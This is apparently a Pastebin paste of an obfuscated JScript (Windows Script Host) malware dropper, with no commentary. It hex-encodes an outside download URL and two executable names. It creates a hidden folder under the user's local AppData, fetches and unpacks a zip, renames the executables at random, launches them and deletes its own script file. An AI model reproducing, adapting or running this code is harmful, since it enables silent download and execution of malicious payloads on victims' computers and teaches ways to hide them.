API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2017
82
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.60 KB | None | 0 0
raw download clone embed print report
  1. /** @type {Array} */
  2. var _0x9471 = [
  3. "WScript.NetWork",
  4. "UserName",
  5. "UserDomain",
  6. "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
  7. "random",
  8. "length",
  9. "floor",
  10. "substring",
  11. "0",
  12. "%",
  13. "Scripting.FileSystemObject",
  14. "WScript.Shell",
  15. "%LocalAppData%",
  16. "\\Microsoft\\",
  17. "s/[^0-9A-Z]//g",
  18. "replace",
  19. "toUpperCase",
  20. "charAt",
  21. "726F6D616E696E672E657865",
  22. "6D6D7363696E672E657865",
  23. "2E657865",
  24. "687474703A2F2F64726976696E672D696E7374727563746F722D6E6577636173746C652E636F6D2F696E636C7564652F636C69702F6D65646D617A2E7A6970",
  25. "\\",
  26. "2E7A6970",
  27. "MSXML2.XMLHTTP",
  28. "onreadystatechange",
  29. "readyState",
  30. "ADODB.Stream",
  31. "open",
  32. "type",
  33. "write",
  34. "position",
  35. "saveToFile",
  36. "close",
  37. "Shell.Application",
  38. "getFile",
  39. "getFolder",
  40. "Count", '"', "1",
  41. "2",
  42. "GET",
  43. "send",
  44. "ScriptFullName"
  45. ];
  46. var uReEidesQi = {
  47. "00": 0,
  48. "01": 1,
  49. "02": 2,
  50. "03": 3,
  51. "04": 4,
  52. "05": 5,
  53. "06": 6,
  54. "07": 7,
  55. "08": 8,
  56. "09": 9,
  57. "0A": 10,
  58. "0B": 11,
  59. "0C": 12,
  60. "0D": 13,
  61. "0E": 14,
  62. "0F": 15,
  63. 10: 16,
  64. 11: 17,
  65. 12: 18,
  66. 13: 19,
  67. 14: 20,
  68. 15: 21,
  69. 16: 22,
  70. 17: 23,
  71. 18: 24,
  72. 19: 25,
  73. "1A": 26,
  74. "1B": 27,
  75. "1C": 28,
  76. "1D": 29,
  77. "1E": 30,
  78. "1F": 31,
  79. 20: 32,
  80. 21: 33,
  81. 22: 34,
  82. 23: 35,
  83. 24: 36,
  84. 25: 37,
  85. 26: 38,
  86. 27: 39,
  87. 28: 40,
  88. 29: 41,
  89. "2A": 42,
  90. "2B": 43,
  91. "2C": 44,
  92. "2D": 45,
  93. "2E": 46,
  94. "2F": 47,
  95. 30: 48,
  96. 31: 49,
  97. 32: 50,
  98. 33: 51,
  99. 34: 52,
  100. 35: 53,
  101. 36: 54,
  102. 37: 55,
  103. 38: 56,
  104. 39: 57,
  105. "3A": 58,
  106. "3B": 59,
  107. "3C": 60,
  108. "3D": 61,
  109. "3E": 62,
  110. "3F": 63,
  111. 40: 64,
  112. 41: 65,
  113. 42: 66,
  114. 43: 67,
  115. 44: 68,
  116. 45: 69,
  117. 46: 70,
  118. 47: 71,
  119. 48: 72,
  120. 49: 73,
  121. "4A": 74,
  122. "4B": 75,
  123. "4C": 76,
  124. "4D": 77,
  125. "4E": 78,
  126. "4F": 79,
  127. 50: 80,
  128. 51: 81,
  129. 52: 82,
  130. 53: 83,
  131. 54: 84,
  132. 55: 85,
  133. 56: 86,
  134. 57: 87,
  135. 58: 88,
  136. 59: 89,
  137. "5A": 90,
  138. "5B": 91,
  139. "5C": 92,
  140. "5D": 93,
  141. "5E": 94,
  142. "5F": 95,
  143. 60: 96,
  144. 61: 97,
  145. 62: 98,
  146. 63: 99,
  147. 64: 100,
  148. 65: 101,
  149. 66: 102,
  150. 67: 103,
  151. 68: 104,
  152. 69: 105,
  153. "6A": 106,
  154. "6B": 107,
  155. "6C": 108,
  156. "6D": 109,
  157. "6E": 110,
  158. "6F": 111,
  159. 70: 112,
  160. 71: 113,
  161. 72: 114,
  162. 73: 115,
  163. 74: 116,
  164. 75: 117,
  165. 76: 118,
  166. 77: 119,
  167. 78: 120,
  168. 79: 121,
  169. "7A": 122,
  170. "7B": 123,
  171. "7C": 124,
  172. "7D": 125,
  173. "7E": 126,
  174. "7F": 127,
  175. 80: 128,
  176. 81: 129,
  177. 82: 130,
  178. 83: 131,
  179. 84: 132,
  180. 85: 133,
  181. 86: 134,
  182. 87: 135,
  183. 88: 136,
  184. 89: 137,
  185. "8A": 138,
  186. "8B": 139,
  187. "8C": 140,
  188. "8D": 141,
  189. "8E": 142,
  190. "8F": 143,
  191. 90: 144,
  192. 91: 145,
  193. 92: 146,
  194. 93: 147,
  195. 94: 148,
  196. 95: 149,
  197. 96: 150,
  198. 97: 151,
  199. 98: 152,
  200. 99: 153,
  201. "9A": 154,
  202. "9B": 155,
  203. "9C": 156,
  204. "9D": 157,
  205. "9E": 158,
  206. "9F": 159,
  207. "A0": 160,
  208. "A1": 161,
  209. "A2": 162,
  210. "A3": 163,
  211. "A4": 164,
  212. "A5": 165,
  213. "A6": 166,
  214. "A7": 167,
  215. "A8": 168,
  216. "A9": 169,
  217. "AA": 170,
  218. "AB": 171,
  219. "AC": 172,
  220. "AD": 173,
  221. "AE": 174,
  222. "AF": 175,
  223. "B0": 176,
  224. "B1": 177,
  225. "B2": 178,
  226. "B3": 179,
  227. "B4": 180,
  228. "B5": 181,
  229. "B6": 182,
  230. "B7": 183,
  231. "B8": 184,
  232. "B9": 185,
  233. "BA": 186,
  234. "BB": 187,
  235. "BC": 188,
  236. "BD": 189,
  237. "BE": 190,
  238. "BF": 191,
  239. "C0": 192,
  240. "C1": 193,
  241. "C2": 194,
  242. "C3": 195,
  243. "C4": 196,
  244. "C5": 197,
  245. "C6": 198,
  246. "C7": 199,
  247. "C8": 200,
  248. "C9": 201,
  249. "CA": 202,
  250. "CB": 203,
  251. "CC": 204,
  252. "CD": 205,
  253. "CE": 206,
  254. "CF": 207,
  255. "D0": 208,
  256. "D1": 209,
  257. "D2": 210,
  258. "D3": 211,
  259. "D4": 212,
  260. "D5": 213,
  261. "D6": 214,
  262. "D7": 215,
  263. "D8": 216,
  264. "D9": 217,
  265. "DA": 218,
  266. "DB": 219,
  267. "DC": 220,
  268. "DD": 221,
  269. "DE": 222,
  270. "DF": 223,
  271. "E0": 224,
  272. "E1": 225,
  273. "E2": 226,
  274. "E3": 227,
  275. "E4": 228,
  276. "E5": 229,
  277. "E6": 230,
  278. "E7": 231,
  279. "E8": 232,
  280. "E9": 233,
  281. "EA": 234,
  282. "EB": 235,
  283. "EC": 236,
  284. "ED": 237,
  285. "EE": 238,
  286. "EF": 239,
  287. "F0": 240,
  288. "F1": 241,
  289. "F2": 242,
  290. "F3": 243,
  291. "F4": 244,
  292. "F5": 245,
  293. "F6": 246,
  294. "F7": 247,
  295. "F8": 248,
  296. "F9": 249,
  297. "FA": 250,
  298. "FB": 251,
  299. "FC": 252,
  300. "FD": 253,
  301. "FE": 254,
  302. "FF": 255
  303. };
  304. var objNet = new ActiveXObject(_0x9471[0]);
  305. var strUserName = objNet[_0x9471[1]];
  306. var strDomain = objNet[_0x9471[2]];
  307. /**
  308. * @param {number} opt_attributes
  309. * @return {?}
  310. */
  311. function RCARANDOMIZE(opt_attributes) {
  312. var collection = _0x9471[3];
  313. var RCARANDOMIZE = _0x9471[4];
  314. /** @type {number} */
  315. i = 0;
  316. for (; i < opt_attributes; i++) {
  317. var resp = Math[_0x9471[7]](Math[_0x9471[5]]() * collection[_0x9471[6]]);
  318. RCARANDOMIZE += collection[_0x9471[8]](resp, resp + 1);
  319. }
  320. return RCARANDOMIZE;
  321. }
  322. /**
  323. * @param {(number|string)} code
  324. * @return {?}
  325. */
  326. function BDyuZeiZue(code) {
  327. code = code.toString(16);
  328. if (code[_0x9471[6]] == 1) {
  329. code = _0x9471[9] + code;
  330. }
  331. code = _0x9471[10] + code;
  332. return unescape(code);
  333. }
  334. /**
  335. * @param {?} path
  336. * @return {undefined}
  337. */
  338. function RCACreateFolder(path) {
  339. var fso = new ActiveXObject(_0x9471[11]);
  340. if (fso.FolderExists(path) == false) {
  341. fso.CreateFolder(path);
  342. }
  343. }
  344. var objWShell = new ActiveXObject(_0x9471[12]);
  345. var RCAAppData = objWShell.ExpandEnvironmentStrings(_0x9471[13]) + _0x9471[14] + strUserName;
  346. RCACreateFolder(RCAAppData);
  347. /**
  348. * @param {Text} dataAndEvents
  349. * @return {?}
  350. */
  351. function DC(dataAndEvents) {
  352. dataAndEvents = dataAndEvents[_0x9471[17]]()[_0x9471[16]](new RegExp(_0x9471[15]));
  353. var DC = _0x9471[4];
  354. var unlock = _0x9471[4];
  355. /** @type {number} */
  356. var r20 = 0;
  357. for (; r20 < dataAndEvents[_0x9471[6]]; r20++) {
  358. unlock += dataAndEvents[_0x9471[18]](r20);
  359. if (unlock[_0x9471[6]] == 2) {
  360. DC += BDyuZeiZue(uReEidesQi[unlock]);
  361. unlock = _0x9471[4];
  362. }
  363. }
  364. return DC;
  365. }
  366. var RCAFILE1 = DC(_0x9471[19]);
  367. var RCAFILE2 = DC(_0x9471[20]);
  368. var RCARANDOMIZEFILE1 = RCARANDOMIZE(8) + DC(_0x9471[21]);
  369. var RCARANDOMIZEFILE2 = RCARANDOMIZE(8) + DC(_0x9471[21]);
  370. RCALNK(DC(_0x9471[22]), RCAAppData + _0x9471[23] + RCARANDOMIZE(8) + DC(_0x9471[24]), RCAAppData);
  371. /**
  372. * @param {?} opt_obj2
  373. * @param {?} path
  374. * @param {?} deepDataAndEvents
  375. * @return {undefined}
  376. */
  377. function RCALNK(opt_obj2, path, deepDataAndEvents) {
  378. var xhr = new ActiveXObject(_0x9471[25]);
  379. /**
  380. * @return {undefined}
  381. */
  382. xhr[_0x9471[26]] = function() {
  383. if (xhr[_0x9471[27]] === 4) {
  384. var pair = new ActiveXObject(_0x9471[28]);
  385. pair[_0x9471[29]]();
  386. /** @type {number} */
  387. pair[_0x9471[30]] = 1;
  388. pair[_0x9471[31]](xhr.ResponseBody);
  389. /** @type {number} */
  390. pair[_0x9471[32]] = 0;
  391. pair[_0x9471[33]](path, 2);
  392. pair[_0x9471[34]]();
  393. var fs = new ActiveXObject(_0x9471[11]);
  394. var fo = new ActiveXObject(_0x9471[35]);
  395. var resp = fo.NameSpace(fs[_0x9471[36]](path).Path);
  396. var row = fo.NameSpace(fs[_0x9471[37]](deepDataAndEvents).Path);
  397. /** @type {number} */
  398. var i = 0;
  399. for (; i < resp.Items()[_0x9471[38]]; i++) {
  400. row.CopyHere(resp.Items().Item(i), 4 + 16);
  401. }
  402. fs.DeleteFile(path);
  403. fs.MoveFile(deepDataAndEvents + _0x9471[23] + RCAFILE1, deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE1);
  404. fo.ShellExecute(_0x9471[39] + deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE1 + _0x9471[39], _0x9471[4], _0x9471[4], _0x9471[29], _0x9471[40]);
  405. fs.MoveFile(deepDataAndEvents + _0x9471[23] + RCAFILE2, deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE2);
  406. fo.ShellExecute(_0x9471[39] + deepDataAndEvents + _0x9471[23] + RCARANDOMIZEFILE2 + _0x9471[39], _0x9471[4], _0x9471[4], _0x9471[29], _0x9471[41]);
  407. }
  408. };
  409. xhr[_0x9471[29]](_0x9471[42], opt_obj2, false);
  410. xhr[_0x9471[43]]();
  411. }
  412. var teste = WScript[_0x9471[44]];
  413. var fso = new ActiveXObject(_0x9471[11]);
  414. fso.DeleteFile(teste);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!